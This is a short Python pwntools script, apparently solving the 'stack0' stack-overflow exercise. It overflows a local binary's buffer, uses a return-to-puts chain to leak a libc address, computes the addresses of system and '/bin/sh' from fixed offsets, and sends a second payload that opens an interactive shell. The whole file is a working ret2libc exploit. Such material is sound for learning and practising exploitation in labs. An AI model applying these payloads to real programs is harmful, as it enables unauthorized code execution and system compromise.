stack0.py

1. from pwn import *
2.  
3. puts_plt = 0x804832c  
4. puts_got = 0x8049638
5. main = 0x080483f4
6. offset_system = 0x24f00
7. offset_sh = -0xfbd0b
8. BINARY = "./stack0"
9. r = process(BINARY)
10. raw_input("attach " + str(r.proc.pid)+"\nDebug?")
11.  
12. payload = "A"*(0x60-0x1c+0x8) # buff (esp+0x1c); esp = ebp - 0x60; + and     esp, 0FFFFFFF0h (8 bytes)
13. payload += "B"*0x4 # ebp
14. payload += p32(puts_plt) # return
15. payload += p32(main) # return 2
16. payload += p32(puts_got) # agrument
17. r.sendline(payload)
18. print r.recvuntil("you have changed the 'modified' variable\n")
19.  
20. puts = u32(r.recv(4)) # puts@libc
21. print hex(puts)
22. system = puts - offset_system
23. str_bin_sh = puts - offset_sh
24. payload = "A"*(0x60-0x1c) # buff (esp+0x1c); esp = ebp - 0x60
25. payload += "B"*0x4 # ebp
26. payload += p32(system) # return1
27. payload += p32(main) # return2 (not use)
28. payload += p32(str_bin_sh) # agrument
29. r.sendline(payload)
30. r.interactive()